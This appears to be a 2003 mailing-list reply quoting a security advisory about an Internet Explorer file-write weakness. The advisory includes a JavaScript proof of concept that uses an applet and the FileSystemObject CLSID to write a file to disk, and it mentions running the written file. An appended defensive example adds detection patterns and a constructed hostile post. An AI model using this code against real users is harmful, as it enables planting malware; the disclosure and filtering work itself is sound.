Re: Internet Explorer JavaScript insecure function

From: npguy (npguy_at_websurfer.com.np)
Date: 12/09/03

    Date: Tue, 9 Dec 2003 08:01:10 +0545
    To: "FREEBRAIN" <freebrain@unionnewbies.net>
    
    

    Hi freebrain,

    The exploit is not working in IE6.
    Your `Proof of concept` requires an `applet`
    in the HTML. Could you please post an HTML?

    Sunday, December 7, 2003, 8:41:57 PM, you wrote:

    F> * Internet Explorer JavaScript insecure function *

    F> Product: Microsoft Internet Explorer
    F> Version: 5.x (probably other versions may be affected)

    F> ***

    F> Problem:

    F> I discovered that a JavaScript function (interpreted by Internet Explorer) called
    F> "file.writeline()" may be
    F> potentially dangerous for Internet Explorer users. This function allows
    F> writing files by means of
    F> JavaScript on a hard disk.

    F> An attacker may use this function by writing JavaScript code in posts on
    F> forums, guestbooks, etc. for owning
    F> his victims' computers. With the "file.writeline()" function the attacker can
    F> write trojans/viruses/etc. on his
    F> victims' hard disks; for example, an attacker may use the JavaScript
    F> "file.writeline()" function for writing
    F> a malicious file in the VBS (Visual Basic Scripting) language.

    F> I repeat, this may be potentially dangerous for Internet Explorer users.

    F> NOTE: Actually a virus in the wild that affects mIRC users is using this
    F> function ("file.writeline").

    F> NOTE2: As you can see on the "Proof of concept", other functions are needed
    F> to carry out an "intrusion".

    F> ***

    F> Proof of concept:

    F> InterfaceObject=document.applets[0];
    F> setTimeout("Write()",1000);
    F> function Write() {
    F> fsoClassID="{0D43FE01-F093-11CF-8940-00A0C9054228}";
    F> InterfaceObject.setCLSID(fsoClassID);
    F> fso = InterfaceObject.createInstance();
    F> // windir = fso.getspecialfolder ;
    F> filename = "\\proof.txt";
    F> var filecontent = "Hello world";
    F> file = fso.opentextfile(filename, "2", "TRUE");
    F> file.writeline(filecontent)
    F> file.close();

    F> }

    F> This code writes a file called "proof.txt" on the hard disk, with the
    F> content "Hello world". Also you can
    F> execute files you write by means of JavaScript by adding "Run();" to the
    F> function.

    F> ***

    F> Solution:

    F> I'm not sure about the solution but I recommend upgrading to the latest
    F> version of Internet Explorer.
    F> Also I recommend that webmasters forbid HTML code that contains this function
    F> in their forums, guestbooks, etc.

    F> ***

    F> Thanks to:

    F> #disidents,#hackers,#hacker @ irc-phoenix.org

    F> #disidents,#sleepx,#ayuda_internet @ irc-hispano.org

    F> Special thanks go to: Impos, |_Tr0mP4s

    F> (sorry for my poor English)

    F> ***

    F> By FREEBRAIN

    F> FREEBRAIN is a member of DisidentS Hacker Team

    F> http://disidents-team.cjb.net (under construction) -
    F> http://www.gratisweb.com/disidents

    F> <freebrain@unionnewbies.net> ( www.unionnewbies.net )
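
The advisory's advice to webmasters, sketched as an added example (not code from either poster): a forum or guestbook escapes every post on output so markup renders as text, and separately flags posts that carry active content for moderator review. Function and rule names are hypothetical, the sample posts are constructed, and the CLSID is the one quoted in the proof of concept.

```javascript
// Added example, not code from the original post. Function and rule names are
// hypothetical; the CLSID is the one quoted in the proof of concept above.
const FSO_CLSID = "0D43FE01-F093-11CF-8940-00A0C9054228";

// Signals that a submitted post carries active content rather than plain text.
const RULES = [
  { id: "script-tag", re: /<\s*script\b/i },
  { id: "applet-tag", re: /<\s*applet\b/i },
  { id: "object-embed", re: /<\s*(object|embed)\b/i },
  { id: "event-handler", re: /<[^>]+\son[a-z]+\s*=/i },
  { id: "script-url", re: /\b(javascript|vbscript)\s*:/i },
  { id: "fso-clsid", re: new RegExp(FSO_CLSID, "i") },
  { id: "fso-call", re: /\b(setCLSID|createInstance|opentextfile|writeline)\s*\(/i },
];

// Returns the ids of every rule the post matches (empty array = nothing flagged).
function flagActiveContent(post) {
  return RULES.filter((rule) => rule.re.test(post)).map((rule) => rule.id);
}

// The actual defence: encode on output so the browser renders markup as text.
function escapeHtml(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return text.replace(/[&<>"']/g, (ch) => map[ch]);
}

// Escape unconditionally; use the flags only to queue the post for review.
function processPost(post) {
  const flags = flagActiveContent(post);
  return { html: escapeHtml(post), flags, needsReview: flags.length > 0 };
}

// Constructed sample inputs.
const BENIGN_POST = "Hello world, great guestbook!";
const HOSTILE_POST =
  '<applet></applet><script>o.setCLSID("{' + FSO_CLSID + '}");' +
  'f = o.createInstance().opentextfile("\\\\proof.txt"); f.writeline("x");</script>';

for (const post of [BENIGN_POST, HOSTILE_POST]) {
  const result = processPost(post);
  console.log(result.needsReview ? "REVIEW" : "OK", result.flags.join(","), result.html);
}
```

The pattern list is a moderation signal only; the output encoding is what keeps a post from running in a reader's browser, whether or not any rule matched.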

